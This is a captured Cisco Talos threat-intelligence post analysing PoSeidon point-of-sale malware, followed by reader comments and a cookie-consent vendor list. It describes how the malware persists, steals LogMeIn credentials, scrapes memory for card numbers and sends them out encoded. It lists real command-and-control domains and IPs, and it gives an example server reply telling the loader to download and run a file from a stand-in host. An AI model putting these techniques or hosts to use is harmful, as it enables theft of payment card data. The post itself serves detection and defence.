blogs.cisco.com
Open in
urlscan Pro
34.96.70.44
Public Scan
Submitted URL: http://blogs.cisco.com/security/talos/poseidon'
Effective URL: https://blogs.cisco.com/security/talos/poseidon
Submission: On November 21 via api from US — Scanned from US
Effective URL: https://blogs.cisco.com/security/talos/poseidon
Submission: On November 21 via api from US — Scanned from US
Form analysis 0 forms found in the DOM
Text Content
Skip to content
Cisco Blogs / Security / Threat Spotlight: PoSeidon, A Deep Dive Into Point of
Sale Malware
March 20, 2015 17 Comments
--------------------------------------------------------------------------------
SECURITY
THREAT SPOTLIGHT: POSEIDON, A DEEP DIVE INTO POINT OF SALE MALWARE
6 min read
Talos Group
This post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings,
Douglas Goddard, William Largent, Angel Villegas, and Alain Zidouemba
Cisco’s Security Solutions (CSS) consists of information security experts with a
unique blend of law enforcement, enterprise security and technology security
backgrounds. The team works directly with Cisco’s Talos Security Intelligence &
Research Group to identify known and unknown threats, quantify and prioritize
risk, and minimize future risk.
When consumers make purchases from a retailer, the transaction is processed
through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS
system is used to read the information stored on the magnetic stripe on the back
of the credit card. Once this information gets stolen from a merchant, it can be
encoded into a magnetic stripe and used with a new card. Criminal markets exist
for this valuable information because the attackers are able to easily monetize
stolen credit card data. Incidents involving PoS malware have been on the rise,
affecting many large organizations as well as small mom-and-pop establishments
and garnering a lot of media attention. The presence of large amounts of
financial and personal information ensures that these companies and their retail
PoS systems will remain attractive targets.
OVERVIEW
There is a new malware family targeting PoS systems, infecting machines to
scrape memory for credit card information and exfiltrate that data to servers,
also primarily .ru TLD, for harvesting and likely resale. This new malware
family, that we’ve nicknamed PoSeidon, has a few components to it, as
illustrated by the diagram below:
At a high level, it starts with a Loader binary that upon being executed will
first try to maintain persistence on the target machine in order to survive a
possible system reboot. The Loader then contacts a command and control server,
retrieving a URL which contains another binary to download and execute. The
downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS
device for number sequences that could be credit card numbers. Upon verifying
that the numbers are in fact credit card numbers, keystrokes and credit card
numbers are encoded and sent to an exfiltration server.
TECHNICAL DETAILS
KEYLOGGER
The file with SHA256
334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps
be at the source of the PoS system compromise. We call this file KeyLogger based
on debugging information found in the binary:
Upon execution, this file copies itself to either
%SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exe and adds
registry entry under HKLM (or
HKCU)\Software\Microsoft\Windows\CurrentVersion\Run.
The file also opens HKCU\Software\LogMeIn Ignition and enumerates the keys for
the account sub key, opens it and deletes the PasswordTicket Value and obtains
the Email Value. Also deletes registry tree HKCU\Software\LogMeIn
Ignition\<key>\Profiles\* .
The file sends to an exfiltration server by POSTing data to one of these URIs:
* wondertechmy[.]com/pes/viewtopic.php
* wondertechmy[.]ru/pes/viewtopic.php
* wondwondnew[.]ru/pes/viewtopic.php
The URI format is
uid=%I64u&win=%d.%d&vers=%s
The Keylogger component was potentially used to steal passwords and could have
been the initial infection vector.
LOADER
The loader for the PoSeidon PoS malware gets its name from debugging information
found in the binary:
Upon being run, Loader checks to see if it’s being executed with one of these
two file names:
* WinHost.exe
* WinHost32.exe
If it is not, it will make sure that no Windows service is running with the name
WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe,
overwriting any file in that location that would happen to have the same name.
Next, Loader will start a service named WinHost.
This is done so that it remains running in memory even if the current user logs
off. If Loader is not able to install itself as a service, it will try to find
other instances of itself running in memory and terminate them. Subsequently, it
will copy itself to %UserProfile%\WinHost32.exe and install the registry key
HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32. Finally, it will create a
new process to execute %UserProfile%\WinHost32.exe.
Now that persistence has been achieved, Loader will delete itself by running the
following command:
* cmd.exe /c del <path_to_itself> >> NUL
The instance of Loader running in memory attempt to read configuration data at
%SystemRoot%\System32\WinHost.exe.cfg. This file can hold a list of URLs to be
added to a list of hardcoded URLs already contained in Loader.
Loader then attempts to contact one of the hardcoded C&C server:
* linturefa.com
* xablopefgr.com
* tabidzuwek.com
* lacdileftre.ru
* tabidzuwek.com
* xablopefgr.com
* lacdileftre.ru
* weksrubaz.ru
* linturefa.ru
* mifastubiv.ru
* xablopefgr.ru
* tabidzuwek.ru
Associated IP Addresses:
* 151.236.11.167
* 185.13.32.132
* 185.13.32.48
* REDACTED at request of Federal Law Enforcement
* 31.184.192.196
* 91.220.131.116
* 91.220.131.87
If one of the domains above resolve to an IP address an HTTP POST is made using
the following user-agent string:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
POST data is sent to either:
* <IP ADDRESS>/ldl01/viewtopic.php
* <IP ADDRESS>/pes2/viewtopic.php
POST data follows the format:
uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s
Loader expects the following response from the C&C server:
{<CommandLetter>:<ArgumentString>}
Example response:
* {R:http://badguy.com/malwarefilename.exe}
* {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}
It’s by fetching and executing the executable referenced in the server response
that the second part of PoSeidon finds its way to the PoS device.
FINDSTR
The loader for the PoSeidon PoS malware gets its name from debugging information
found in the binary:
An embedded PE is extracted through shellcode and execution continues with the
embedded binary. This file installs a minimal keylogger that is implemented
similarly to the description found here. The data intercepted by this keylogger
will later be sent to an exfiltration server.
The PE then cycles through all running processes on the PoS device to look for
processes with a security token not associated with the “NT AUTHORITY” domain
name. It iterates through all read/write pages within those processes for credit
card info.
The malware only looks for number sequences that start with:
* 6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)
* 3 with a length of 15 digits (AMEX)
It then uses the Luhn algorithm to verify that the numbers are actually credit
or debit card numbers as shown by the code segment below:
Next, DNS resolution is attempted for the domains below. These are some of the
known data exfiltration servers:
* quartlet.com
* horticartf.com
* kilaxuntf.ru
* dreplicag.ru
* fimzusoln.ru
* wetguqan.ru
If one of the domains above resolve to an IP address an HTTP POST is made using
the following user-agent string:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
POST data is sent to:
<IP ADDRESS>/pes13/viewtopic.php
Data follows the following format:
oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s
optional POST data (data: credit card numbers, logs: keylogger data)
&data=<XORed_with_0x2A_then_base64_data_unk>
&logs=<XORed_with_0x2A_then_base64_data_unk>
Credit card numbers and keylogger data is sent to the exfiltration server after
being XORed and base64 encoded.
The expect response from the exfiltration server is:
This mechanism allows for the the malware to update itself, based on commands
received from the exfiltration server.
LOADER VS FINDSTR
Comparing an unpacked copy of Loader version 11.4 to an unpacked copy of
FindStr version 7.1 with Bindiff shows that 62% of the functionality in both
samples is the same. The actors behind this malware probably developed some core
functionality and compiled it into a library to be used by other projects they
are developing.
IOC
Click for Endpoint IOC Version
Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc
Domains
* linturefa.com
* xablopefgr.com
* tabidzuwek.com
* linturefa.ru
* xablopefgr.ru
* tabidzuwek.ru
* weksrubaz.ru
* mifastubiv.ru
* lacdileftre.ru
* quartlet.com
* horticartf.com
* kilaxuntf.ru
* dreplicag.ru
* fimzusoln.ru
* wetguqan.ru
IP Addresses:
* 151.236.11.167
* 185.13.32.132
* 185.13.32.48
* REDACTED at request of Federal Law Enforcement
* 31.184.192.196
* 91.220.131.116
* 91.220.131.87
* REDACTED at request of Federal Law Enforcement
Conclusion
PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS
systems that demonstrate the sophisticated techniques and approaches of malware
authors. Attackers will continue to target PoS systems and employ various
obfuscation techniques in an attempt to avoid detection. As long as PoS attacks
continue to provide returns, attackers will continue to invest in innovation and
development of new malware families. Network administrators will need to remain
vigilant and adhere to industry best practices to ensure coverage and protection
against advancing malware threats.
Snort Rules: 33836-33852. Please refer to Defense Center or FIREsight management
console for updated information.
Protecting Users from These Threats
We encourage organizations to consider security best practices, starting with a
threat-centric approach. Given the dynamic threat landscape, we advocate this
threat-centric and operationalized approach that implements protections across
the extended network – and across the full attack continuum – before, during,
and after an attack. This approach is predicated upon superior visibility,
continuous control, and advanced threat protection across the extended network
and the entire attack continuum
Share
Share:
AUTHORS
TALOS GROUP
TALOS SECURITY INTELLIGENCE & RESEARCH GROUP
--------------------------------------------------------------------------------
17 COMMENTS
* John Doe says:
March 21, 2015 at 4:35 pm
“REDACTED at request of Federal Law Enforcement”
What’s that?
* Michael Kirkpatrick says:
March 23, 2015 at 1:58 am
There is probobly an on going investigation being conducted by law
enforcment agencies. They don’t want that IP or domain name revealed in
case it impacts on their investigation.
* Anonymous says:
March 23, 2015 at 10:38 am
That is beyond stupid.
When malware authors read this article, they will know what IPs have been
[redacted] and not listed in the report and just null those IPs out and
start using new ones…
* Urban C}{aos says:
March 24, 2015 at 6:09 am
This isn’t just for the Malware authors but also for the general snoopy
people on the Internet. Botnet C2C traffic may get adulterated by
thousands more connections thereby hindering investigations.
* eduard tovt says:
May 11, 2015 at 1:51 am
non rekvalite sitems uniti problems v doskonalenie sistemi kattorie
bolhe net na simle besapasnastie nasagelaveka na sypytnika skanivanie
is kosmasa nasa ani twklycat orussie kalignie rakety simy ynigtassenie
nacii gelaweka na 2018 v okeani pretupas ressdenie was kto iuslessit
ifarmaciua amerika prinala resultat unitassenia nacii myslman katowi a
rakety masowi parassenie evropi ungtahenie myssicow na simle bydte
bititelnie reformcii
* Nick Kelly says:
March 23, 2015 at 9:09 am
The file path is definitely windows. Do we know if this malware can remain
persistent on an embedded XP system or just a full Windows install? Thx
* JJ Cummings says:
March 23, 2015 at 9:33 am
We have seen this malware establish persistence on both embedded Windows XP
and Windows 7 systems.
* jlindema says:
March 24, 2015 at 2:07 pm
It will be nice when…
the information scraped from the POS terminals is either no longer valid,
and/or can only be used by the first merchant to ‘claim’ the card number (and
not be used over and over again). Tokenization is the key.
Final -a startup located in Mtn. View, CA is working on this. Check out:
getfinal (dot) com.
* Joel says:
March 24, 2015 at 2:14 pm
I think Apple has already figured this out with Apple Pay..
* Apple Hater says:
March 24, 2015 at 2:20 pm
You mean google wallet?
* Mildar says:
March 25, 2015 at 1:14 am
How does these PoS systems get infected?
It is uncommon to search web pages or receive emails on Pay terminals. So
USB? (not very effective?) or not updated system -> exploit?
* Marpos says:
March 26, 2015 at 6:35 pm
Mildar is on point. How is this malware propagating? What’s the attack
vector.
* TD says:
April 4, 2015 at 3:00 am
Likely USB or the like, you’d be surprised how effective localized
infection vectors can be. Ask Target.
* NL says:
April 10, 2015 at 3:32 pm
Can you please provide MD5 Hash for IOC’s above?
* Douglas Held says:
April 11, 2015 at 7:08 am
Authors, thank you for this well written information.
I’m really interested to know whether the Loader service stays resident once
the attack is underway?
In that case, I think the simplest way to detect an infected system would be
to che for the registered device name ‘WinHost(32)?’… Correct?
Thanks
* Douglas Held says:
April 11, 2015 at 10:51 am
Correction; service name “WinHost”….
* Bradley Cyprus says:
April 15, 2015 at 9:09 am
To answer the question about how stations get infected. Many POS malware
infections start with insecure remote access. For example, over the past 12
months, LogMeIn was used insecurely by several POS companies. An account was
breached, and the hacker was able to access 100’s of POS stations in an
unattended mode. There are ways to use these tools correctly, but many do
not. For more data about this, look at the Department of Homeland Security
brief:
http://www.us-cert.gov/sites/default/files/publications/BackoffPointOfSaleMalware.pdf
Comments are closed.
CISCO CYBERSECURITY VIEWPOINTS
Where security insights and innovation meet. Read the e-book, see the video,
dive into the infographic and more...
Get expert perspectives now
WHY CISCO SECURITY?
Explore our Products & Services
Learn More
CONNECT WITH US
*
*
*
*
*
By continuing to use our website, you acknowledge the use of cookies.
Privacy Statement Change Settings
CONSENT MANAGER
Your Opt Out Preference Signal is Honored
* YOUR PRIVACY
* STRICTLY NECESSARY COOKIES
* PERFORMANCE COOKIES
* TARGETING COOKIES
* FUNCTIONAL COOKIES
YOUR PRIVACY
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. From the list on
left, please choose whether this site may use Performance and/or Targeting
Cookies. By selecting Strictly Necessary Cookies only, you are requesting Cisco
not to sell or share your personal data. Note, blocking some types of cookies
may impact your experience on the site and the services we are able to offer.
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.
VENDOR LIST
ONETRUST
Always Active
PARENT COMPANY
ONETRUST
DEFAULT DESCRIPTION
ONETRUST LLC (ONETRUST) IS A PROVIDER OF PRIVACY MANAGEMENT SOFTWARE PLATFORM.
THE COMPANY'S PLATFORM SUPPORTS ORGANIZATIONS TO ADHERE COMPLIANCE WITH THE DATA
PRIVACY, GOVERNANCE AND SECURITY REGULATIONS ACROSS SECTORS AND JURISDICTIONS.
PERFORMANCE COOKIES
Performance Cookies
These cookies provide metrics related to the performance and usability of our
site. They are primarily focused on gathering information about how you interact
with our site, including: page load times, response times, error messages, and
allowing a replay of a visitor’s interactions with our site, which enables us to
review and analyze visitor behavior, helping to improve site usability and
functionality. These cookies also allow us to count visits and traffic sources
so we can measure and improve the performance of our site. They help us to know
which pages are the most and least popular and see how visitors move around the
site. If you do not allow these cookies we will not know when you have visited
our site and will not be able to monitor its performance.
VENDOR LIST
MARKETO
PARENT COMPANY
ADOBE
DEFAULT DESCRIPTION
MARKETO DEVELOPS AND SELLS MARKETING AUTOMATION SOFTWARE FOR ACCOUNT-BASED
MARKETING AND OTHER MARKETING SERVICES AND PRODUCTS INCLUDING SEO AND CONTENT
CREATION.
FULLSTORY
PARENT COMPANY
FULLSTORY, INC.
DEFAULT DESCRIPTION
FULLSTORY TELLS CUSTOMERS EVERYTHING THEY NEED TO KNOW ABOUT THEIR USERS DIGITAL
EXPERIENCE.
CLOUDFLARE
PARENT COMPANY
CLOUDFLARE INC.
DEFAULT DESCRIPTION
CLOUDFLARE’S GLOBAL CLOUD PLATFORM DELIVERS A RANGE OF NETWORK SERVICES TO
BUSINESSES OF ALL SIZES AROUND THE WORLD—MAKING THEM MORE SECURE WHILE ENHANCING
THE PERFORMANCE AND RELIABILITY OF THEIR CRITICAL INTERNET PROPERTIES.
TWITTER
PARENT COMPANY
TWITTER INC.
DEFAULT DESCRIPTION
TWITTER IS AN AMERICAN MICROBLOGGING AND SOCIAL NETWORKING SERVICE ON WHICH
USERS POST AND INTERACT WITH MESSAGES KNOWN AS "TWEETS". REGISTERED USERS CAN
POST, LIKE, AND RETWEET TWEETS, BUT UNREGISTERED USERS CAN ONLY READ THOSE THAT
ARE PUBLICLY AVAILABLE.
YAHOO TRACKER
PARENT COMPANY
APOLLO GLOBAL MANAGEMENT, INC.
DEFAULT DESCRIPTION
YAHOO OPERATES AN ONLINE WEB PORTAL INTENDED TO PROVIDE THE LATEST NEWS ON
FINANCE, LIFESTYLE, MOVIES, CELEBRITY, TRAVEL, AND MORE.
ADOBE AUDIENCE MANAGER
PARENT COMPANY
ADOBE
DEFAULT DESCRIPTION
ADOBE AUDIENCE MANAGER IS ADOBE'S BEST-IN-CLASS DATA MANAGEMENT PLATFORM.
AMPLITUDE
PARENT COMPANY
AMPLITUDE, INC.
DEFAULT DESCRIPTION
AMPLITUDE IS THE PIONEER IN DIGITAL OPTIMIZATION SOFTWARE.
CONTENTSQUARE
PARENT COMPANY
CONTENTSQUARE
GOOGLE ANALYTICS
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
GOOGLE ANALYTICS IS A WEB ANALYTICS SERVICE OFFERED BY GOOGLE THAT TRACKS AND
REPORTS WEBSITE TRAFFIC, CURRENTLY AS A PLATFORM INSIDE THE GOOGLE MARKETING
PLATFORM BRAND.
MPULSE
PARENT COMPANY
AKAMAI TECHNOLOGIES, INC.
DEFAULT DESCRIPTION
AKAMAI MPULSE IS A REAL USER MONITORING (RUM) SOLUTION THAT ENABLES DEVELOPERS,
ADMINS, AND PERFORMANCE ENGINEERS TO EASILY SEE WEBSITE PERFORMANCE PROBLEMS AND
DISCOVER OPTIMIZATION OPPORTUNITIES.
KRUX
PARENT COMPANY
SALESFORCE.COM, INC.
DEFAULT DESCRIPTION
SALESFORCE DMP, FORMERLY KRUX, STRENGTHENS CONSUMER RELATIONSHIPS ACROSS ALL
TOUCHPOINTS WITH ITS POWERFUL DATA MANAGEMENT PLATFORM.
YAHOO
PARENT COMPANY
APOLLO GLOBAL MANAGEMENT, INC.
DEFAULT DESCRIPTION
YAHOO OPERATES AN ONLINE WEB PORTAL INTENDED TO PROVIDE THE LATEST NEWS ON
FINANCE, LIFESTYLE, MOVIES, CELEBRITY, TRAVEL, AND MORE.
BIZIBLE
PARENT COMPANY
MARKETO/ADOBE
DEFAULT DESCRIPTION
BIZIBLE UNIFIES BEHAVIORAL AND AD DATA WITH SALES OUTCOMES AND MACHINE LEARNING,
HELPING CUSTOMERS MAKE THE RIGHT MARKETING DECISIONS.
BLUEKAI
PARENT COMPANY
ORACLE
DEFAULT DESCRIPTION
ORACLE BLUEKAI DATA MANAGEMENT PLATFORM, FORMERLY BLUEKAI, IS A CLOUD-BASED DATA
MANAGEMENT PLATFORM THAT ENABLES COMPANIES TO PERSONALIZE ONLINE, OFFLINE, AND
MOBILE MARKETING CAMPAIGNS.
QUALTRICS
PARENT COMPANY
QUALTRICS
DEFAULT DESCRIPTION
QUALTRICS, CREATOR OF THE CUSTOMER EXPERIENCE MANAGEMENT (XM) CATEGORY, OFFERS A
SYSTEM OF ACTION THAT HELPS BUSINESSES ATTRACT CUSTOMERS WHO STAY LONGER AND BUY
MORE, ENGAGE EMPLOYEES WHO BUILD A POSITIVE CULTURE, DEVELOP BREAKTHROUGH
PRODUCTS PEOPLE LOVE AND BUILD A BRAND PEOPLE ARE PASSIONATE ABOUT.
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
VENDOR LIST
PUBMATIC
PARENT COMPANY
PUBMATIC, INC.
DEFAULT DESCRIPTION
PUBMATIC’S SELL-SIDE PLATFORM EMPOWERS THE WORLD’S LEADING DIGITAL CONTENT
CREATORS ACROSS THE OPEN INTERNET TO CONTROL ACCESS TO THEIR INVENTORY AND
INCREASE MONETIZATION BY ENABLING MARKETERS TO DRIVE RETURN ON INVESTMENT AND
REACH ADDRESSABLE AUDIENCES ACROSS AD FORMATS AND DEVICES.
ADFORM
PARENT COMPANY
ADFORM
DEFAULT DESCRIPTION
ADFORM IS A GLOBAL, INDEPENDENT AND FULLY INTEGRATED ADVERTISING PLATFORM BUILT
FOR MODERN MARKETING.
GOOGLE ADSENSE
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
GOOGLE ADSENSE IS A PROGRAM RUN BY GOOGLE THROUGH WHICH WEBSITE PUBLISHERS IN
THE GOOGLE NETWORK OF CONTENT SITES SERVE TEXT, IMAGES, VIDEO, OR INTERACTIVE
MEDIA ADVERTISEMENTS THAT ARE TARGETED TO THE SITE CONTENT AND AUDIENCE.
FACEBOOK
PARENT COMPANY
META PLATFORMS, INC.
DEFAULT DESCRIPTION
FACEBOOK IS AN ONLINE SOCIAL MEDIA AND SOCIAL NETWORKING SERVICE OWNED BY META
PLATFORMS.
HUBSPOT
PARENT COMPANY
HUBSPOT, INC.
DEFAULT DESCRIPTION
HUBSPOT IS A LEADING CRM PLATFORM THAT PROVIDES SOFTWARE AND SUPPORT TO HELP
COMPANIES GROW BETTER. THE PLATFORM INCLUDES MARKETING, SALES, SERVICE,
OPERATIONS, AND WEBSITE MANAGEMENT PRODUCTS THAT START FREE AND SCALE TO MEET
OUR CUSTOMERS' NEEDS AT ANY STAGE OF GROWTH.
DOUBLECLICK
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
DOUBLECLICK DIGITAL MARKETING (DDM) IS AN INTEGRATED AD TECHNOLOGY PLATFORM
OWNED BY GOOGLE THAT ENABLES ADVERTISERS TO CREATE AND MANAGE DIGITAL MARKETING
CAMPAIGNS.
MICROSOFT BING ADVERTISING
PARENT COMPANY
MICROSOFT
DEFAULT DESCRIPTION
MICROSOFT IS A SOFTWARE CORPORATION THAT DEVELOPS, MANUFACTURES, LICENSES,
SUPPORTS, AND SELLS A RANGE OF SOFTWARE PRODUCTS AND SERVICES.
LINKEDIN ADS
PARENT COMPANY
MICROSOFT
DEFAULT DESCRIPTION
LINKEDIN IS AN AMERICAN BUSINESS AND EMPLOYMENT-ORIENTED ONLINE SERVICE THAT
OPERATES VIA WEBSITES AND MOBILE APPS.
TABOOLA
PARENT COMPANY
TABOOLA
DEFAULT DESCRIPTION
TABOOLA IS THE WORLD'S LEADING DISCOVERY AND NATIVE ADVERTISING PLATFORM THAT
HELPS PEOPLE EXPLORE WHAT'S INTERESTING AND NEW IN THE MOMENT OF NEXT.
RUBICON PROJECT
PARENT COMPANY
MAGNITE INC.
DEFAULT DESCRIPTION
RUBICON PROJECT WAS A TECHNOLOGY COMPANY THAT PIONEERED THE AUTOMATION OF
DIGITAL ADVERTISING. IN 2020, THE COMPANY MERGED WITH CONNECTED TV LEADER
TELARIA AND BECAME MAGNITE.
AMAZON ASSOCIATES
PARENT COMPANY
AMAZON
DEFAULT DESCRIPTION
THE AMAZON AFFILIATE PROGRAM, OR AMAZON ASSOCIATES, IS AN AFFILIATE MARKETING
PROGRAM.
THE TRADE DESK
PARENT COMPANY
THE TRADE DESK
DEFAULT DESCRIPTION
THE TRADE DESK IS A TECHNOLOGY COMPANY THAT EMPOWERS BUYERS OF ADVERTISING.
THROUGH ITS SELF-SERVICE, CLOUD-BASED PLATFORM, AD BUYERS CAN CREATE, MANAGE,
AND OPTIMIZE MORE EXPRESSIVE DATA-DRIVEN DIGITAL ADVERTISING CAMPAIGNS ACROSS AD
FORMATS, INCLUDING DISPLAY, VIDEO, AUDIO, NATIVE AND SOCIAL, ON A MULTITUDE OF
DEVICES, INCLUDING COMPUTERS, MOBILE DEVICES, AND CONNECTED TV.
APPNEXUS
PARENT COMPANY
XANDR INC. (AT&T)
DEFAULT DESCRIPTION
A BUSINESS UNIT WITHIN AT&T, XANDR POWERS A GLOBAL MARKETPLACE FOR PREMIUM
ADVERTISING.
SHARETHROUGH
PARENT COMPANY
SHARETHROUGH
DEFAULT DESCRIPTION
SHARETHROUGH IS ONE OF THE TOP GLOBAL INDEPENDENT OMNICHANNEL AD EXCHANGES.
MEDIAMATH
PARENT COMPANY
MEDIAMATH
DEFAULT DESCRIPTION
MEDIAMATH IS AN INDEPENDENT ADVERTISING TECHNOLOGY COMPANY FOR BRANDS AND
AGENCIES.
SIZMEK
PARENT COMPANY
AMAZON
DEFAULT DESCRIPTION
SIZMEK AD SUITE GIVES CUSTOMERS CREATIVE CONTROL TO ENGAGE AUDIENCES WITH
RELEVANT, IMPACTFUL ADS WHILE CENTRALIZING CROSS-CHANNEL INSIGHTS TO AID IN
CAMPAIGN OPTIMIZATION.
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
VENDOR LIST
WHOIS PRIVACY SERVICE
PARENT COMPANY
CENTRALNIC
DEFAULT DESCRIPTION
THE WHOIS PRIVACY PROTECTION SERVICE KEEPS YOUR CONTACT INFORMATION PRIVATE FOR
A DOMAIN.
GOOGLE
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
FOR APPS OR SITES, USER-GENERATED CONTENT IS CONTENT THAT USERS CONTRIBUTE
TOWARD ANY APP OR SITE, VISIBLE TO AT LEAST A SUBSET OF OTHER USERS.
USER-GENERATED CONTENT CAN INCLUDE TEXT, COMMENTS, IMAGES, VIDEO, PROFILES,
USERNAMES, VOTES, LIKES, HEARTS, OR OTHER MEDIA, FOR EXAMPLE.
FONT AWESOME
PARENT COMPANY
FONT AWESOME
DEFAULT DESCRIPTION
FONT AWESOME IS A FONT AND ICON TOOLKIT BASED ON CSS AND LESS.
CISCO SYSTEMS
PARENT COMPANY
CISCO SYSTEMS, INC.
DEFAULT DESCRIPTION
CISCO'S HARDWARE, SOFTWARE, AND SERVICE OFFERINGS ARE USED TO CREATE THE
INTERNET SOLUTIONS THAT MAKE NETWORKS POSSIBLE.
GITHUB
PARENT COMPANY
GITHUB, INC.
DEFAULT DESCRIPTION
GITHUB, INC. IS A PROVIDER OF INTERNET HOSTING FOR SOFTWARE DEVELOPMENT AND
VERSION CONTROL USING GIT. IT OFFERS THE DISTRIBUTED VERSION CONTROL AND SOURCE
CODE MANAGEMENT FUNCTIONALITY OF GIT, PLUS ITS OWN FEATURES.
WISTIA
PARENT COMPANY
WISTIA, INC.
DEFAULT DESCRIPTION
WISTIA IS A COMPLETE VIDEO HOSTING PLATFORM FOR BETTER MARKETING.
STRIPE
PARENT COMPANY
STRIPE INC.
DEFAULT DESCRIPTION
STRIPE OPERATES PAYMENT PROCESSING SOFTWARE FOR E-COMMERCE WEBSITES.
UNPKG
PARENT COMPANY
CLOUDFLARE INC.
DEFAULT DESCRIPTION
UNPKG IS A FAST, GLOBAL CONTENT DELIVERY NETWORK FOR EVERYTHING ON NPM. USE IT
TO QUICKLY AND EASILY LOAD ANY FILE FROM ANY PACKAGE USING A URL.
FORCE BY SALESFORCE
PARENT COMPANY
SALESFORCE.COM, INC.
DEFAULT DESCRIPTION
SALESFORCE UNITES CUSTOMERS' MARKETING, SALES, COMMERCE, SERVICE, AND IT TEAMS
FROM ANYWHERE WITH CUSTOMER 360 — ONE INTEGRATED CRM PLATFORM THAT POWERS OUR
ENTIRE SUITE OF CONNECTED APPS.
BOOTSTRAPCDN
PARENT COMPANY
JSDELIVR
DEFAULT DESCRIPTION
BOOTSTRAPCDN IS A PUBLIC CONTENT DELIVERY NETWORK.
ZIFT SOLUTIONS
PARENT COMPANY
ZIFT SOLUTIONS
DEFAULT DESCRIPTION
ZIFT SOLUTIONS INCREASES CHANNEL SALES AND BOOSTS MARKETING IMPACT BY DELIVERING
A SUPERIOR TECHNOLOGY PLATFORM, STRATEGIC INSIGHT AND GLOBAL CHANNEL SUPPORT.
RECAPTCHA
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
RECAPTCHA USES AN ADVANCED RISK ANALYSIS ENGINE AND ADAPTIVE CHALLENGES TO KEEP
MALICIOUS SOFTWARE FROM ENGAGING IN ABUSIVE ACTIVITIES ON YOUR WEBSITE.
BRIGHTCOVE
PARENT COMPANY
BRIGHTCOVE, INC.
DEFAULT DESCRIPTION
BRIGHTCOVE OFFERS A ROBUST VIDEO PLATFORM THAT ALLOWS INDIVIDUALS AND BUSINESSES
TO SHARE, STREAM AND HOST.
TEALIUM
PARENT COMPANY
TEALIUM INC.
DEFAULT DESCRIPTION
TEALIUM SELLS ENTERPRISE TAG MANAGEMENT, AN API HUB, A CUSTOMER DATA PLATFORM
WITH MACHINE LEARNING, AND DATA MANAGEMENT PRODUCTS, ALLOWING THEIR CUSTOMERS TO
CONNECT THEIR DATA SO THEY CAN CONNECT WITH CUSTOMERS.
GSTATIC
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
GSTATIC.COM IS A WEB DOMAIN OWNED AND USED BY GOOGLE FOR ACCESSING THE GSTATIC
SERVER: A SERVER WHERE GOOGLE HOSTS ITS STATIC CONTENT LIKE CSS, IMAGES OR
JAVASCRIPT.
IGODIGITAL
PARENT COMPANY
SALESFORCE.COM, INC.
DEFAULT DESCRIPTION
SALESFORCE UNITES CUSTOMERS' MARKETING, SALES, COMMERCE, SERVICE, AND IT TEAMS
FROM ANYWHERE WITH CUSTOMER 360 — ONE INTEGRATED CRM PLATFORM THAT POWERS OUR
ENTIRE SUITE OF CONNECTED APPS.
JSDELIVR
PARENT COMPANY
PROSPECT ONE
DEFAULT DESCRIPTION
JSDELIVR IS A PUBLIC, OPEN-SOURCE CDN (CONTENT DELIVERY NETWORK) FOCUSED ON
PERFORMANCE, RELIABILITY, AND SECURITY. IT IS FREE TO USE FOR EVERYONE, WITH NO
BANDWIDTH LIMITS.
GOOGLE TAG MANAGER
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
GOOGLE TAG MANAGER IS A TAG MANAGEMENT SYSTEM (TMS) THAT ALLOWS YOU TO QUICKLY
AND EASILY UPDATE MEASUREMENT CODES AND RELATED CODE FRAGMENTS COLLECTIVELY
KNOWN AS TAGS ON YOUR WEBSITE OR MOBILE APP. ONCE THE SMALL SEGMENT OF TAG
MANAGER CODE HAS BEEN ADDED TO YOUR PROJECT, YOU CAN SAFELY AND EASILY DEPLOY
ANALYTICS AND MEASUREMENT TAG CONFIGURATIONS FROM A WEB-BASED USER INTERFACE.
APPDYNAMICS
PARENT COMPANY
CISCO
DEFAULT DESCRIPTION
CISCO APPDYNAMICS DELIVERS FULL-STACK OBSERVABILITY THAT ALLOWS CUSTOMERS TO
SEE, UNDERSTAND, AND OPTIMIZE WHAT HAPPENS INSIDE AND BEYOND THEIR ARCHITECTURE.
